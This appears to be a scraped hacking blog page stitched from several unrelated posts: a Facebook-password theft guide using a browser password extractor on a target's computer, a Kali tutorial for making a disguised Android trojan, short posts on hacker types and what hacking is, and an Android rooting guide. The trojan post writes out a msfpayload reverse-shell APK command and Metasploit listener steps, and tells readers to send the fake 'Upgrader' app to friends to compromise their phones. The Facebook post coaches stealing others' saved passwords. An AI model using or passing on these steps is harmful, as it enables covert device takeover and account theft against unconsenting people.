Welcome back, my novice hackers!
As we saw in my first tutorial on Facebook hacking, it is not a simple task. However, with the right skills and tools, as well as persistence and ingenuity, nothing is beyond our capabilities.
One of the cardinal rules of hacking is: "If I can get physical access to the computer... GAME OVER!" This means that if I were given even just a few moments to the machine itself, I can hack anything I want from that computer—including Facebook passwords.
I recognize that not all of you are technically savvy, though, that doesn't mean you can't be with some hard work. So this Facebook hack is for those of you without either the technical savvy or the work ethic to become so. All you need is a moment or two of unfettered physical access to the target's computer and you can easily have their Facebook password.

Remember Me?

This hack relies upon the fact that most of us want websites to remember us when we return. We don't want to put in our username and password every time we want to access the site, so we tell the browser to "Remember me." In that way, we don't need to re-authenticate and provide our password, our system simply remembers it and provides it to the website.
Of course, those passwords must be stored somewhere on our computer. The key is to know where those passwords are stored and how to crack the hashed passwords when we find them. For instance, Mozilla stores the users passwords at:
c:/Users/Username/AppData/Local/Mozilla/Firefox/Profiles/**.default/cache2/entries
As you can see in the screenshot below, I have displayed that directory and password hashes from a Windows 7 computer running Firefox 36. These are all the saved passwords from various websites that Firefox has stored.
Note that the location of these passwords is in different places for each browser and sometimes in different places on different operating systems with the same browser. Look for more on this subject in my Digital Forensics series in the near future.

Elcomsoft's Facebook Password Extraction Tool

Fortunately for us, there is a company in Russia named Elcomsoft.
This company employs first-rate cryptographers and they develop and sell software to crack various password encryption schemes. (As a side note, a cryptographer from Elcomsoft was the first person arrested and prosecuted under the DCMA when he came to the U.S. for a conference. He was eventually acquitted.)
Their software is listed as digital forensic tools, but they can just as easily be used for hacking purposes. One of their tools was used for the iCloud hack that revealed nude photos of Jennifer Lawrence and other Hollywood stars in August 2014.
Elcomsoft developed a Windows tool named Facebook Password Extractor (FPE, for short) that extracts the user's Facebook password from its location on the user's system (the user must have used the "Remember me" feature) and then cracks it. Of course, we need physical access to the system to do this in most cases. Alternatively, if we can hack their system, we could upload this tool to the target system and then use it or we could simply download the user's browser password file and use this tool locally on our system.
You can download this free tool from Elcomsoft's website, which officially supports the following web browsers (though it may work on newer versions).
  • Microsoft Internet Explorer (up to IE9)
  • Mozilla Firefox (up to Firefox 4)
  • Apple Safari (up to Safari 5)
  • Opera (up to Opera 11)
  • Google Chrome (up to Chrome 11)
The process of using this tool is almost idiot-proof. (Almost a requirement for Facebook hacking, wouldn't you agree?) You simply install it on the system whose Facebook password you want to extract and it does everything else.
One of the drawbacks to using this tool is that Elcomsoft released it back in 2011 and it has not been updated since. Maybe we should make this a Python project for the Null Byte community in the near future?
Look for more on Facebook hacking and developing the skills and arts of a professional hacker here in the near future, my novice hackers!




Hello Hackers! Welcome to my 2nd Post:
This is a tutorial explaining how to hack android phones with Kali.
I can't see any tutorials explaining this Hack/Exploit, so, I made one.
(Still ,you may already know about this)
Also Read :- How to Hack Access Whatsapp using bypass 

Step 1Fire-Up Kali:

  • Open a terminal, and make a Trojan.apk
  • You can do this by typing :
  • msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
  • You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)

Step 2Open Another Terminal:

Step 3Set-Up a Listener:

  • After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler
  • Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
  • To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 4Exploit!

  • At last type: exploit to start the listener.
  • Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
  • Then send it using Uploading it to Dropbox or any sharing website (like: www.speedyshare.com).
  • Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
Also Read :- Create batch file for Windows 10
  • Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
  • However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
  • And when he clicks Open...

Step 5BOOM!

There comes the meterpreter prompt:

Download IT assignment-1 click here

https://drive.google.com/folderview?id=0B7-WkxaD-txUQTRUaHNHYmpYUGc
hello guys today my post is about which type of hacker you are. This important thing which hacker you are this is depending on Your choices make you who you are.

Script kiddie: 

Script kiddies, in a word are noobs. They are the people who use tools, scripts, methods and programs created by real hackers. They are the ones who don't know how a system works but are still able to exploit it with previously available tools, not by walking in the footsteps of actual hackers but simply coding what they did and using it for malicious purposes. A script kiddie is that one annoying kid in class, who pisses off everyone else. Don't be that guy.

White hat hacker:

A white hat hacker is a computer and network expert who attacks a security system on behalf of its owners or as a hobby, seeking vulnerabilities that a malicious hacker could exploits, a white hat hacker notifies the system's owners to fix the breach before it is taken advantage of.

Black hat hacker:

A black hat is a person who compromises the security of a computer system without permission from an authorized party, typically with malicious intent. A black hat will maintain knowledge of the vulnerabilities and exploits they find for a private advantage, not revealing them to the public or the manufacturer for correction.

Grey hat hackers:

A gray hat is a skilled hacker who sometimes will act legally and other times may not. They are a cross between white hat and black hat hackers. They usually do not hack for personal gain or have malicious intentions, but may or may not occasionally commit crimes during the course of technological exploits.

Hacktivists:

These are the hackers who use their hacking skills for protesting against injustice and attack a target system or websites to popularize a nation or gather attention to specific case for rectification. They are vigilantes, The dark Knights of hacking universe. This where good intentions collide with the law, for hacktivists may or may not carry out illegal activities to get their point across to the world. They includes outlaws who deliver their own brand rough justice, they are usually experts confident in their stealth skills so as not to get caught.

Sucide hacker:

Sucide hacker are those who are hack for some purpose and even not think he want to suffer in jail for his illegal activities.They are good and bad guys also.

If you like my post then like my Facebook page for more hacking tricks & methods.

https://m.facebook.com/Techwebspot-903431946376201

By Jeet Rami 
Hello guys today i my post is about what is hacking ? This post is for beginner who don't know the meaning of hacking and say he is hacker this brief post explain you in details. Now we start :-

In cyber security world, the person who is able to discover a weakness in the system and manages to exploit it to accomplish his goal (Good or Bad) is referred as a hacker, and the process is referred to hacking.

Nowadays, people think that hacking is only hijacking Facebook accounts or defacing website. Yes, it is also part of hacking field but it doesn't mean that it is all there is. This is not even the tip of iceberg.

So what is exactly hacking?! That is exactly what this post is for.

Hacking is the practice of gaining the unauthorized access of a system, in order to viewing, editing, copying the information or to accomplish a goal outside of the creator's original purpose. The person who is consistently engaging in hacking activities is called a hacker.

Hacker is a term used by some to mean "a clever programer" and my others, especially those in popular media, to mean "someone who tries to break into computer systems"

Why do hackers do hack ?


  • Just for fun
  • To show off
  • Notify many people their thoughts
  • Steal important information 
  • To destroy enemy's computer network 

Hacking Examples

  • Vladimir Levin hacks citibank Rusian crime ring leader Vladimir levin managed to gain access to accounts located in the Citibank network and stole millions of dollars in 1995.
  • Jonathan james hacks NASA Jonathan james was 16 when, in 1999, he hacked into NASA, and downloaded proprietary software and informations.

Advantages of Hacking

  1. Can be use to recover lost information where the computer password is lost.
  2. Teaches you that no technology is 100% secure.
  3. To test how good security is on your own network.
  4. They call it white hat computer hacking.

Disadvantage of Hacking

  1. Criminals.
  2. It can use it to their advantage.
  3. Can harm someone's privacy.
  4. It's illegal.

If you like my post then like my Facebook page for more hacking tricks & methods.

https://m.facebook.com/Techwebspot-903431946376201

By Jeet Rami 
hello guys todays my topic is how to do root your android mobile by easily.

Note:-

I am not responsible if your mobile have damage or brick in this process.

Steps:-


  1. Download kingo root in your pc. For download kingo root click here.
  2. Now install kingo root.
  3. After install connect your mobile with pc through USB cable.
  4. Now open setting of your mobile and then go to developer option in that enable usb debugging. If you not see that developer option then click on about device then click twice on buil number then go back and now you see developer option.
  5. Now open kingo root in pc.
  6. Now it say to download your mobile drivers if you not installed your mobile drivers in pc.
  7. Now you see "Root" option click on that to start the process. It takes couple of time to do that.
  8. And when this process is running nothing other work start on your pc.
  9. And main thing is do not be panic and do patient.
  10. Aftter some time it show "ROOT SUCCEED".
  11. Now your mobile is rooted. And now you see superuser app on your mobile 
  12. If you want to check that your mobile is rooted perfectly or not you download root checker app in your mobile.


If you like my post then like my Facebook page for more hacking tricks & methods.

https://m.facebook.com/Techwebspot-903431946376201

By Jeet Rami